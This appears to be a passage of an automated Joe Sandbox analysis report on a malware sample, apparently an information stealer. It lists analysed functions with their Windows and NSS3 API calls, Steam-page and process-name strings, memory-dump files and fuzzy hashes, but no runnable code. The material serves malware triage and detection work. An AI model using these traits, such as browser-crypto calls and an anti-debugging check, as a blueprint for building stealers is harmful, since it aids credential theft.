                                                                                                                                                                                          Function 00031E5D Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0027E908,?,?,?,000328A1,?,?,00000000), ref: 00031E7D
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?,000328A1,?,?,00000000), ref: 00031E8A
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,000328A1,?,?,00000000), ref: 00031E91
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocBinaryCryptProcessString
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1871034439-0
                                                                                                                                                                                          • Opcode ID: a719a0bc9baf7c4e72d5608de63ef05c5b5d8cf645f89d9a22a1a9d884da6050
                                                                                                                                                                                          • Instruction ID: 03f45ee948e8153446f6d8778ac036ff58d799ae2ceb511e6eeb5e78c6c71429
                                                                                                                                                                                          • Opcode Fuzzy Hash: a719a0bc9baf7c4e72d5608de63ef05c5b5d8cf645f89d9a22a1a9d884da6050
                                                                                                                                                                                          • Instruction Fuzzy Hash: 82010C71500209BFDF129F61DC899AF7BBEFF4D3A4B244458F80597110D7329991EB60
                                                                                                                                                                                          Function 00028048 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CryptStringToBinaryA.CRYPT32(00026724,00000000,00000001,00000000,?,00000000,00000000), ref: 00028060
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,?,?,?,00026724,?), ref: 0002806E
                                                                                                                                                                                          • CryptStringToBinaryA.CRYPT32(00026724,00000000,00000001,00000000,?,00000000,00000000), ref: 00028084
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,00026724,?), ref: 00028093
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4291131564-0
                                                                                                                                                                                          • Opcode ID: 05008b0c59ef689a6e6bc2b19cda018845fa5256b77c1b2fe58b8c94f5ea7174
                                                                                                                                                                                          • Instruction ID: bb09448e3d23d1f7135e8a1f6601b9172838c95a7a1d749cc27c7f025f80c950
                                                                                                                                                                                          • Opcode Fuzzy Hash: 05008b0c59ef689a6e6bc2b19cda018845fa5256b77c1b2fe58b8c94f5ea7174
                                                                                                                                                                                          • Instruction Fuzzy Hash: E2F0E774102234BBDF715F66EC8DE8B7FADEF0ABA0B104495F909E6250E7714980DBA1
                                                                                                                                                                                          Function 6C4C4DB0 Relevance: 5.3, Strings: 4, Instructions: 318COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 0dl$Pdl$pdl$winUnlockReadLock
                                                                                                                                                                                          • API String ID: 0-2880156936
                                                                                                                                                                                          • Opcode ID: a0d89774d01dca86a85c7b8c13682cdfc1a7915bf6b5bdb5bf601385750bfd39
                                                                                                                                                                                          • Instruction ID: 9da95df6571d76da04b5c4f3e029db25453d7d8a49357cda8d76f2bafa89f931
                                                                                                                                                                                          • Opcode Fuzzy Hash: a0d89774d01dca86a85c7b8c13682cdfc1a7915bf6b5bdb5bf601385750bfd39
                                                                                                                                                                                          • Instruction Fuzzy Hash: 12E17B74A093419FDB04DF29D584A6ABBF0FF8A308F01861DE89997320E7309985CF86
                                                                                                                                                                                          Function 6C456CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InitializeConditionVariable.KERNEL32(?), ref: 6C456D45
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C456E1E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ConditionExclusiveInitializeLockReleaseVariable
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4169067295-0
                                                                                                                                                                                          • Opcode ID: 19e51342418696fe6880f8bc6cd7da36690c82d60b69ba614f25a3aac8f1bc2d
                                                                                                                                                                                          • Instruction ID: 21e96deb5eeac8e6e877d7c07730790a837da558bc41174219131053025400a8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 19e51342418696fe6880f8bc6cd7da36690c82d60b69ba614f25a3aac8f1bc2d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6AA16E756183808FD715DF25C490FAEBBE1BF89308F44491DD88A87751DB70A859CB92
                                                                                                                                                                                          Function 6C58ED70 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 217memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C58EE3D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity, xrefs: 6C58EF0E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Alloc_ArenaUtil
                                                                                                                                                                                          • String ID: m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity
                                                                                                                                                                                          • API String ID: 2062749931-1856350843
                                                                                                                                                                                          • Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                          • Instruction ID: 9bf32cbe57f7533fa3f41525a5e4c62c2cc8dcfeb773b092a1029eaa36b569aa
                                                                                                                                                                                          • Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                          • Instruction Fuzzy Hash: B771D276E027118FD718CF59DC8066AB7F2BBC8304F15862DE8569BB91D7B0E900CB90
                                                                                                                                                                                          Function 6C55EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C55F019
                                                                                                                                                                                          • PK11_GenerateRandom.NSS3(?,00000000), ref: 6C55F0F9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorGenerateK11_Random
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3009229198-0
                                                                                                                                                                                          • Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                                                                                                                          • Instruction ID: 4baee950316fc1263c547dce09c4bc5921ace5de005f159d03a767ab059d0e6e
                                                                                                                                                                                          • Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E919F71A0031A8BCB14CF68CC916AEB7F2BF85324F64472ED962A7BD0D734A915CB51
                                                                                                                                                                                          Function 0003C0E9 Relevance: 3.1, APIs: 2, Instructions: 63timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocalTime.KERNEL32(?,759183C0,00000000,?,?,?,?,?,?,?,?,0003C5A4,?), ref: 0003C13E
                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0003C5A4,?), ref: 0003C14C
                                                                                                                                                                                            • Part of subcall function 0003B92A: FileTimeToSystemTime.KERNEL32(?,?,?,?,0003C211,?,?,?,?,?,?,?,?,?,?,0003C5B4), ref: 0003B942
                                                                                                                                                                                            • Part of subcall function 0003B906: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0003B923
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 568878067-0
                                                                                                                                                                                          • Opcode ID: 78e414e034d4c4dee898527732c5394a1798291c71cc5e5c90ef62f32939046f
                                                                                                                                                                                          • Instruction ID: fb2f72fc200ba679d21af59536a651164db71500458989a026c9d6a54f2e7f12
                                                                                                                                                                                          • Opcode Fuzzy Hash: 78e414e034d4c4dee898527732c5394a1798291c71cc5e5c90ef62f32939046f
                                                                                                                                                                                          • Instruction Fuzzy Hash: FA2128B19002098FDF45DF69C8806AE7BF8FF08300F1040BAE948EB216E7349945DBA1
                                                                                                                                                                                          Function 0002145B Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 0002146D
                                                                                                                                                                                          • NtQueryInformationProcess.NTDLL(00000000), ref: 00021474
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CurrentInformationQuery
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3953534283-0
                                                                                                                                                                                          • Opcode ID: 08a3d705b46f296aad9a42aa88a96c34b077748fbb61d8d0d29f304868721147
                                                                                                                                                                                          • Instruction ID: 36fe21e7603d40404e9793fc032998b6e779350d631c8fa5de68fe0dd005429e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 08a3d705b46f296aad9a42aa88a96c34b077748fbb61d8d0d29f304868721147
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FE01271640304F7EF509BA0ED0AF9E72ECD704749F1000A4A30AE60C0D6B8DA0096A5
                                                                                                                                                                                          Function 6C48AC00 Relevance: 2.9, Strings: 2, Instructions: 445COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • .exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon., xrefs: 6C48B058
                                                                                                                                                                                          • em" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunit, xrefs: 6C48B024, 6C48B0F1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: .exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.$em" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunit
                                                                                                                                                                                          • API String ID: 0-1746701309
                                                                                                                                                                                          • Opcode ID: d81046726fdaaf2ef9aed6e5a33fa459cd6e22c03343ac7a457f96d5a771752f
                                                                                                                                                                                          • Instruction ID: 582f0efdde7f19fb7d060f4c24e16504ccd84a9f41ac3b22e40c224f08f95c87
                                                                                                                                                                                          • Opcode Fuzzy Hash: d81046726fdaaf2ef9aed6e5a33fa459cd6e22c03343ac7a457f96d5a771752f
                                                                                                                                                                                          • Instruction Fuzzy Hash: EAF13A7160A7458FD700CF28C890FAAB7E2AFC5359F188A2DE5D4877C1E7B4D8858792
                                                                                                                                                                                          Function 6C455C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcmp.VCRUNTIME140(?,?,6C424A63,?,?), ref: 6C455F06
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcmp
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1475443563-0
                                                                                                                                                                                          • Opcode ID: 357dfc86968879c43831ecf9eb23d576011d3da6b985e398d27f2c0ca09accd9
                                                                                                                                                                                          • Instruction ID: 3b43a16bd6a7c425705fe3f46fdd28419c1b8d8b39ec98bd9765b5d8eb058c31
                                                                                                                                                                                          • Opcode Fuzzy Hash: 357dfc86968879c43831ecf9eb23d576011d3da6b985e398d27f2c0ca09accd9
                                                                                                                                                                                          • Instruction Fuzzy Hash: C6C1D375E012098BCB04CF95D190EEEBBF2FF89318F68815DD8556BB44D732A816CB80
                                                                                                                                                                                          Function 0004B556 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EnumSystemLocalesA.KERNEL32(Function_0002B1C1,00000001), ref: 0004B56F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EnumLocalesSystem
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2099609381-0
                                                                                                                                                                                          • Opcode ID: 9b65454bbc1976e855a01acc00ae5beac1ba27be4dbe48e7c17048d83bc369e7
